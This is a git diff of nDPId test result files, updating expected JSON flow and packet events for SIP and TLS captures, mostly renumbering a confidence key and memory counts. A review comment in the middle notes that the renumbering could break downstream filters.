-00677{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":105,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1120469572844,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":31644,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1120469572844,"flow_last_seen":1120471094413,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":34047,"flow_avg_l4_payload_len":405,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1120470985348,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1548,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTCP","breed":"Acceptable","category":"VoIP"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTCP","breed":"Acceptable","category":"VoIP"}} +00677{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":105,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1120469572844,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":31644,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1120469572844,"flow_last_seen":1120471094413,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":34047,"flow_avg_l4_payload_len":405,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1120470985348,"flow_last_seen":1120470985511,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1548,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTCP","breed":"Acceptable","category":"VoIP"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":112,"source":"sip.pcap","alias":"nDPId-test","packets-captured":112,"packets-processed":112,"total-skipped-flows":0,"total-l4-payload-len":44455,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":7,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1120471094413} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 112/112 @@ -40,9 +40,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875871 bytes -~~ total memory freed........: 5875871 bytes -~~ total allocations/frees...: 118238/118238 +~~ total memory allocated....: 6009505 bytes +~~ total memory freed........: 6009505 bytes +~~ total allocations/frees...: 121000/121000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 1532 chars 
diff --git a/test/results/sip_hello.pcapng.out b/test/results/sip_hello.pcapng.out new file mode 100644 index 000000000..ed0f098ca --- /dev/null +++ b/test/results/sip_hello.pcapng.out 
@@ -0,0 +1,26 @@ +00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"sip_hello.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"sip_hello.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1645515834707} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645515834707,"flow_last_seen":1645515834707,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1645515834707,"l3_proto":"ip4","src_ip":"10.239.156.235","dst_ip":"172.29.38.91","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645515834707,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":13,"thread_ts_msec":1645515834707,"pkt":"AAAAAAAAAAIAsZqMCABFAAAh925AAP0RDAoK75zrrB0mWxPEE8QADQAAaGVsbG8AAAAAAAAAAAA="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645515834709,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":13,"thread_ts_msec":1645515834709,"pkt":"AAAAAAAAAAUAlkboCABFAAAhAABAAEARwHmsHSZbCu+c6xPEE8QADRonaGVsbG8AAAAAAAAAAAA="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645515883863,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":13,"thread_ts_msec":1645515883863,"pkt":"AAAAAAAAAAIAsZqMCABFAAAhIqxAAP0R4MwK75zrrB0mWxPEE8QADQAAaGVsbG8AAAAAAAAAAAA="} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1645515834707,"flow_last_seen":1645515995292,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1645515995292,"l3_proto":"ip4","src_ip":"10.239.156.235","dst_ip":"172.29.38.91","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":15,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1645515834707,"flow_last_seen":1645516031332,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":619,"flow_tot_l4_payload_len":2063,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1645516031332,"l3_proto":"ip4","src_ip":"10.239.156.235","dst_ip":"172.29.38.91","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":23,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1645515834707,"flow_last_seen":1645516227955,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":619,"flow_tot_l4_payload_len":2103,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1645516227955,"l3_proto":"ip4","src_ip":"10.239.156.235","dst_ip":"172.29.38.91","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"sip_hello.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1645515834707,"flow_last_seen":1645516326267,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":619,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1645516326267,"l3_proto":"ip4","src_ip":"10.239.156.235","dst_ip":"172.29.38.91","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"sip_hello.pcapng","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":4134,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":2,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1645516326267} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 30/30 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 4134 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6003947 bytes +~~ total memory freed........: 6003947 bytes +~~ total allocations/frees...: 120906/120906 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 460 chars +~~ json string max len.......: 689 chars +~~ json string avg len.......: 571 chars diff --git a/test/results/sites.pcapng.out b/test/results/sites.pcapng.out index 4e019b9d3..046097863 100644 
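Review bot: The expected output added for sip_hello.pcapng pins `"confidence": {"6":"DPI"}`, and the sites.pcapng.out hunk that follows rewrites the same key from `"4"` to `"6"` on otherwise identical events, so the numeric confidence id is evidently not stable across libnDPI bumps. A downstream consumer that filters or alerts on the numeric key rather than on the `"DPI"` string would silently stop matching after this update, and nothing in the commit record flags the renumbering. I would add a changelog or commit-message line such as `confidence ids renumbered by libnDPI (DPI: 4 -> 6); match on the name, not the id`. It is also worth confirming that the event schema, which is not visible here, does not restrict the key to the old value range.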
--- a/test/results/sites.pcapng.out +++ b/test/results/sites.pcapng.out 
@@ -4,97 +4,97 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595957694169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1595957694169,"pkt":"CL6sCxdumt9Y+uvcCABFAAA86wlAAEAGQqHAqAypRav6FLRQAbvxSUO4AAAAAKAC\/\/943AAAAgQFtAQCCAp3CF\/6AAAAAAEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595957694175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1595957694175,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8AABAAFUGGKtFq\/oUwKgMqQG7tFDMBUIi8UlDuaASbHAk8gAAAgQFeAQCCAqwcikLdwhf+gEDAwg="} 00980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595957694181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":447,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":447,"pkt_l4_len":413,"thread_ts_msec":1595957694181,"pkt":"CL6sCxdumt9Y+uvcCABFAAGx6wtAAEAGQSrAqAypRav6FLRQAbvxSUO5zAVCI4AYAKzC2gAAAQEICncIYAWwcikLFgMBAXgBAAF0AwMbz\/EVbbBeXTFd91pcxBNP5UcnCfq3Wnx+FKK431A8vCCYle6z8aZolVAW\/WsVOAFFqAocCpVZly96\/6VmRt6unAAGEwETAhMDAQABJQArAAUEAwT7GgAKAAYABAAdABcAMwAmACQAHQAgzM0Khe3cuLbHFAoUoUQ75VluiC+bl0wBHYa7GiFLSWoADQAGAAQEAwgEAAAAGwAZAAAWZWRnZS1tcXR0LmZhY2Vib29rLmNvbQAQAAsACQJoMgVoMi1mYgAtAAMCAQAAKgAAACkAoQB8AHb7PHlIDGTq5r6EmcaA47DeHw9k60TmJpJ4kMbWc07CmAAAAACvwY+4+cqVZO3LiyMH\/OBKqYTgxknPoune8SSx08gYUQ5v8dX54IHzjPiACk0t5hhgO+DjiFkUqTNKryO5SnHrNvAKz6QqOMdma4t912EvXAHgfFvQwwAhIFgFM36LO5BemV+W466ubu2dweNDP\/fyvoT9kq0FWNy9"} 
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1595957694169,"flow_last_seen":1595957694181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1595957694181,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1595957694188,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1595957694169,"flow_last_seen":1595957694181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1595957694181,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1595957694188,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":597,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1623221441867} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623221441867,"flow_last_seen":1623221441867,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623221441867,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623221441867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623221441867,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA8opRAAEAGGajAqAH6XHpfY6OWAbs7TQBaAAAAAKAC\/\/9coQAAAgQFtAQCCAqqdeFuAAAAAAEDAwk="} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623221441879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623221441879,"pkt":"AoEfHBPlpJGxgjQ5CABFAAA8AABAADgGxDxcel9jwKgB+gG7o5aALohKO00AW6AS\/ojeuQAAAgQFtAQCCAoeqlgsqnXhbgEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623221441880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623221441880,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA0opVAAEAGGa\/AqAH6XHpfY6OWAbs7TQBbgC6IS4AQAKwLVQAAAQEICqp14Xweqlgs"} -00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221441867,"flow_last_seen":1623221441893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623221441893,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623221441867,"flow_last_seen":1623221441911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623221441911,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1623221442073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"}} 
+00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221441867,"flow_last_seen":1623221441893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623221441893,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 